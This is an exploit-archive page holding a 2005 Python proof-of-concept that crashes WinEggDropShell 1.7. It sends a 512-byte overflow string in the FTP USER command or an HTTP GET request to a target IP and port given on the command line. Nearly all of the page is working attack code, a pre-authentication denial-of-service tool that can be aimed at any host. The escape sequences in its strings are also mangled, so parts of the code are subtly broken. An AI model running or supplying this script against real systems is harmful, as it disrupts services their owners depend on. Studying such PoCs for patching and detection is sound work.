[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WinEggDropShell 1.7 Multiple PreAuth Remote Stack Overflow PoC
# Published : 2005-12-02
# Author : Sowhat
# Previous Title : Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC
# Next Title : MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET" && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11
# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo
import sys
import string
import socket
if (len(sys.argv) != 4):
print "##########################################################################"
print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC #"
print "# This Poc will BOD the vulnerable target #"
print "# Bug Discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "##########################################################################"
print "nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Portn"
print "Example: n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
sys.exit(0)
host = sys.argv[2]
port = string.atoi(sys.argv[3])
if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):
request = "USER " + 'A'*512 + "r"
if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):
request = "GET /" + 'A'*512 + " HTTP/1.1 rn"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)
# www.Syue.com [2005-12-02]